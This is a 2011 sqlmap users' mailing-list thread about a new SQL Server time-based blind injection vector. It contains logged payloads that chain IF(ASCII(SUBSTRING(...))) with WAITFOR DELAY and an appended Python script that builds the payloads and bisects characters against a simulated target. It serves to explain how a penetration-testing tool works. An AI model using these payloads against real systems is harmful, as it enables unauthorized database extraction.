Re: [sqlmap-users] New SQL Server blind test
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:08:52
"Since you seem anxious, I'll send the warm-up." - you thought that I was kidding :) It was really a sincere mail, and this is the core part: "it looks like an SQL abomination, and I still can't believe it, but it appears that this really works"

On Tue, Jan 18, 2011 at 3:05 AM, Miroslav Stampar <mir...@gm...> wrote:
> Well, I've apologized already. I realized 15 minutes ago that this
> really is a new SQL injection vector.
>
> You can find yourself in the latest revision commit of the doc/THANKS file.
>
> kr
>
> On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote:
>> On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
>>> OK, fair enough.
>>>
>>> Please just send one of the payloads used for data retrieval (something
>>> like this one):
>>>
>>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>>>
>>> You'll see them with -v 3. You can censor table names. Please, I just
>>> want to see something workable used for data retrieval (just spot
>>> those payloads with '>' inside).
>>>
>>> kr
>>
>> Since you seem anxious, I'll send the warm-up... Hasn't hit the good part
>> yet. ;-)
>>
>> [09:41:40] [INFO] fetching database names
>> [09:41:40] [INFO] fetching number of databases
>> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
>> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:37] [INFO] retrieved: 24
>> [09:43:37] [DEBUG] performed 10 queries in 117 seconds
>>
>> --
>> | Steven Pinkham, Security Consultant |
>> | http://www.mavensecurity.com        |
>> | GPG public key ID CD31CAFB          |
>
> --
> Miroslav Stampar
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
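What makes the payload in Steve's log unusual is its shape: the single quote closes the application's own string literal and `IF(...) WAITFOR DELAY` follows it directly, with no `AND`/`OR` and no semicolon, so T-SQL (which does not require a statement separator) parses the IF as the next statement, and `--` comments out the remainder of the original query. The ten `> threshold` probes then recover "24" one digit at a time from the presence or absence of the 12-second delay. The script below is an added illustration for this thread, not sqlmap's code and not anything posted above: it rebuilds that payload shape and runs a plain bisection over the ASCII range against a constructed stand-in for the target (`FAKE_DB_COUNT`, a fixed base latency, and the injected delay added only when the condition holds), so it runs offline and never contacts a server. The search strategy is a generic binary search, not sqlmap's own, which starts from a narrower range.

```python
"""Time-based blind inference through SQL Server's IF ... WAITFOR DELAY.

Added illustration for this thread; not sqlmap code. Nothing here talks to a
real server: the "target" is simulated so the run is offline and deterministic.
"""

# Constructed stand-in for the target: the text the payload probes, i.e.
# COUNT(name) FROM master..sysdatabases cast to VARCHAR. "24" matches the
# value retrieved in the thread.
FAKE_DB_COUNT = "24"

INNER_QUERY = (
    "SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) "
    "FROM master..sysdatabases"
)


def build_payload(prefix, position, threshold, delay_seconds=12, token="MQWi"):
    """Return the injected value in the same shape as the thread's payloads.

    The quote after ``prefix`` closes the original string literal; IF (...)
    follows with no AND/OR and no semicolon, and T-SQL accepts it as the next
    statement. ``--`` comments out the rest of the original query, so the
    trailing ``AND 'MQWi'='MQWi`` is dead text that only leaves the original
    query's own closing quote with something to close.
    """
    return (
        f"{prefix}'IF(ASCII(SUBSTRING(({INNER_QUERY}), {position}, 1)) > {threshold}) "
        f"WAITFOR DELAY '0:0:{delay_seconds}'-- AND '{token}'='{token}"
    )


def condition_holds(value, position, threshold):
    """Emulate ASCII(SUBSTRING(value, position, 1)) > threshold.

    Past the end SUBSTRING returns '' and ASCII('') is NULL, so the comparison
    is UNKNOWN and the IF body never runs: every probe at that position comes
    back fast, which is how the end of the value shows up (the '> 1' probe in
    the log is that check).
    """
    if position > len(value):
        return False
    return ord(value[position - 1]) > threshold


def simulated_response_seconds(position, threshold, base_latency=0.3, delay_seconds=12):
    """Stand-in for timing the HTTP request: the delay is added only when IF fires."""
    fires = condition_holds(FAKE_DB_COUNT, position, threshold)
    return base_latency + (delay_seconds if fires else 0.0)


def make_timing_oracle(base_latency=0.3, delay_seconds=12):
    """Turn a response time into a yes/no answer.

    Cutting at half the injected delay tolerates ordinary jitter in either
    direction; a real run has to measure the baseline first, which is what
    sqlmap's "larger statistical model" warning in the log refers to.
    """
    cutoff = base_latency + delay_seconds / 2

    def oracle(position, threshold):
        seconds = simulated_response_seconds(position, threshold, base_latency, delay_seconds)
        return seconds >= cutoff

    return oracle


def infer_char(position, oracle, low=0, high=127):
    """Bisect one character's code using only 'ASCII > threshold' questions.

    Returns (code, queries_sent); code 0 means no character at this position.
    """
    queries = 0
    while low < high:
        mid = (low + high) // 2
        queries += 1
        if oracle(position, mid):
            low = mid + 1        # the character is above mid
        else:
            high = mid           # at or below mid, or no character at all
    return low, queries


def infer_value(oracle, max_len=64):
    """Recover the string one position at a time until a position yields nothing."""
    chars = []
    total_queries = 0
    for position in range(1, max_len + 1):
        code, queries = infer_char(position, oracle)
        total_queries += queries
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars), total_queries


if __name__ == "__main__":
    value, sent = infer_value(make_timing_oracle())
    print(f"retrieved: {value} ({sent} queries)")
    print(build_payload("asdf", 1, 51))
```

Bisecting the full 0..127 range costs seven probes per position (21 in total for "24" plus the end check), against the ten in Steve's log, whose thresholds of 48..54 show sqlmap starting from a much narrower range; with a 12-second delay on every true answer, that difference is what decides whether a dump finishes.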